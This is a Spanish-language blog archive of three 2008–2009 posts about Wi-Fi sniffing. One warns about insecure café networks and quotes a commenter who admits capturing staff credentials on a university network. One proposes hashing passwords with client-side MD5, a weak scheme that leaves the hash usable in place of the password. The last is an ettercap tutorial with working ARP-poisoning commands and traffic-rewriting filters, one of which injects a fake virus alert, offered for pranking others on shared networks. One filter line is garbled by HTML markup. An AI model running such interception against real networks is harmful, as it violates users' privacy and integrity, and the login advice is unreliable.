El rincón de Zerial » sniffer

Inseguridad de redes inalámbricas en cafeterias, pubs, hoteles, etc

Zerial — Sat, 21 Nov 2009 16:02:11 +0000

Me gustaría escribir un poco sobre el tema de la seguridad en las redes inalámbricas que uno se encuentra cuando va a alguna cafetería, hotel, pub, restorante, etc. Es muy común que sólo las personas que consuman algún producto en el local tengan acceso a wifi, para esto la súper medida de protección que se toma es entregar en un papelito la clave de la WiFi y que, aunque no lo crean, generalmente es una clave WEP y más todavía, muchas veces es una clave por defecto entregada por el proveedor. Este tipo de accesos muy pocas veces (por no decir nunca) cuentan con un portal cautivo o captive portal, algún tipo de protección o filtro en un firewall, proxy, etc y para rematar, este tipo de señales son emitidas con los típicos router de marca dlink (sí, esos baratos) o bien uno de marca X que cueste poco dinero.
La mayoría de la gente que acude a éste tipo de lugares, no son expertos informáticos o en seguridad ni tienen mucho conocimiento en temas de protección de información, redes inalámbricas, etc. Generalmente son personas “normales” que se compran un portatil (pc, mac o lo que sea) y se conectan a una red donde sea que la pillen. Realizan sus transferencias (desde su banco online), revisan su correo, inician sesión en los servicios que tengan cuenta, chatean, etc sin ni si quiera preocuparse (yo diría que ni si quiera se imaginan) de que alguien puede estar leyendo y/o observando todo lo que está haciendo, filtrando y guardando información.

¿Y cómo termina todo esto?
Por ejemplo, con ésto.

Como dice mi querido amigo Clark en un comentario de un post anterior:

@Zerial, con respecto a este tema te encuentro toda la razon, sin tener mucho conociento en el tema hice algunas pruebas por una wifi con cifrado wep de una universidad X y chan! claro despues de un rato de acostumbramiento comence a adquirir user y pass de los funcionarios, pc’s, servidores y mas informacion, claro ahora estoy con la duda de dar a conocer sus problemas?, vuelvo a repetir no tengo muchos conocimientos en el tema pero hacerlo fue gratificante como dice @andres. ademas puedo decir que me encanto y me pico el bichito de la curiosidad lo que me lleva a documentarme mejor en el tema! y ahora se que alguien siempre esta escuchando del otro lado :s.

No hay que ser un experto, no hay que ser un jajajahacker ni un experto en seguridad informática, simplemente hay que tener las herramientas para hacerlo y ni si quiera saber ocupar las herramientas al 100%, actualmente con la información que hay en el manual de ettercap es posible lograr muchas cosas. Al igual que en una conversación telefónica, celular o lo que sea, siempre puede haber un tercero que esté filtrando la información, siempre puede existir un “hombre en el medio” (MiTM).
No se trata de un tema de paranoia ni nada por el estilo, pero creo que debemos tomar conciencia y tener conocimiento de donde nos estamos conectando, a traves de quien estamos pasando, etc.

En mi caso, cuando me conecto a unas de estas redes no dejo de hacer las cosas que hago siempre, pero me aseguro de que nadie esté “escuchando” lo que estoy haciendo. Si me aparece un certificado falso, obviamente no lo voy a aceptar (cosa que el común de la gente si lo hace), no voy a hacer transferencias ni ingresar a la cuenta de mi banco, y si trafico información importante me aseguro de que la información viaje por un canal seguro.

Tal véz deba existir algo que regule éste tipo de cosas.

Compartir/Guardar

Cómo agregar una capa más de seguridad a un login

Zerial — Wed, 15 Jul 2009 04:14:29 +0000

Un sistema de inicio de sesión tradicional funciona simplemente enviando, en texto plano, los datos de usuario y password al sistema en php o el lenguaje que sea, el sistema lo recibe, lo encripta y lo compara con la información de la base de datos para saber si es correcto o no. Lo que no está mal, pero deja abierta la posibilida de que alguien este sniffeando la red y capture los datos en bruto (raw) o texto plano.
Como podemos ver en el siguiente esquema:

Una forma que se me ocurrió para que los datos del formulario, especialmente la password, no viajarán en texto plano, fue encriptarla mediante javascript al momento de hacer el submit. De esta forma, cuando el atacante logre capturar los datos lo que verá es una cadena en md5, como aparece en el siguiente gráfico:

Los pros y contras
Este método nos entregará una capa de seguridad dependiente del navegador, obviamente, para que funcione vamos a necesitar un navegador con soporte de javascript y tambien un sistema de login adaptado para recibir un string ya cifrado en md5.
Como puntos a favor, podemos decir que para el atacante (sniffer) será más complicado obtener la clave en texto plano. Si esta persona usa el mismo sistema para autentificarse usando el hash md5 snifeado, el javascript volverá a encriptarlo y cuando lo envie, no va a coincidir con el hash que está en la base de datos.
Como punto en contra, el usuario de todas formas podrá logearse cuando obtenga el hash, con algun script o un login paralelo que no haga la encriptación de la clave pero por otro lado, el atacante nunca podrá saber la password que usa la persona, sólo conocerá su hash el cual no le servirá para ingresar a otros servicios, en el caso que use la misma password para mas de un sistema.
Como punto a favor, este metodo puede dificultarle la tarea a atacantes newbies, que seguramente intentarán logearse una y otra véz con el hash que capturaron preguntandose ¿WTF, que le pasa a esta mierda que no funciona?.

Video demostrativo

www.youtube.com/watch?v=P4lyA77DtZY

Links a Youtube: http://www.youtube.com/watch?v=P4lyA77DtZY
Descargar (ogv, 47Mb)

Compartir/Guardar

Filtros simples en ettercap

Zerial — Sun, 07 Dec 2008 21:52:17 +0000

Les motraré cómo crear filtros simples para usar con ettercap, para que podamos modificar parte del tráfico como tags html, conversaciones de chat, etc.
Para esto necesitamos obviamente instalar el suit ettercap-ng, lo podemos descargar desde Sitio oficial ettercap

Haremos las pruebas con el sitio http://www.google.cl, modificaremos el título, el contenido, la imágen, etc.

Para este ejemplo vamos a crear un filtro llamado google.filter. Lo creamos usando nuestro editor de texto preferido, en mi caso vim:

$ vim google.filter

En él escribimos:

replace("", "");
replace(""</span>, <span class="st0">"<title>Gooooooogle");

Guardamos y compilamos el filtro usando etterfilter:

$ etterfilter google.filter

Nos creará un fichero llamado filter.ef, que es el que usaremos.
Ejecutamos ettercap y aplicamos el filtro:

# ettercap -Tq -M arp:remote -i interface -F filter.ef // //

Ahora cualquier pc de la red, cuando ingrese a Google, verá el título modificado.

Podemos modificar el tag o información que queramos, no solo html, sino todo el tráfico de la red.
Por ejemplo, si queremos modificar la o las imágen de un sitio:

replace("\<img", "\<img src=http://direccion..de/la/imagen/que/quieres_insertar.jpg\> \<aaa");

nota: Con todo esto, lo que estámos haciendo es modificar cualquier información que este viajando por la red, no solo las páginas web, si hacen la prueba y escriben por msn, verán que ettercap automáticamente lo reemplazará por lo que especificamos en el filtro.
Tambien podemos especificar que sólo queremos jugar con el protocolo http y la web agregando la siguiente condición a nuestro filtro:

if (ip.proto == TCP && tcp.src == 80) {

[…] acá las acciones

}

Aprendiendo a aplicar e implementar estos filtros podemos hacer una infinidades de cosas divertidas, ya sea para fastidiar a algun amigo o simplemente para joder a los demás. Es cosa de usar la imaginación, por ejemplo, el siguiente filtro:

replace("\<body", "\<body onload=\"alert(‘Usted tiene un virus.’);confirm(‘Chupamela?’);\"\>");

Hará que cuando alguien ingrese a cualquier sitio aparezca una alerta diciendo que tiene un virus y luego, para joderle un poco más, una ventana de confirmación.

Compartir/Guardar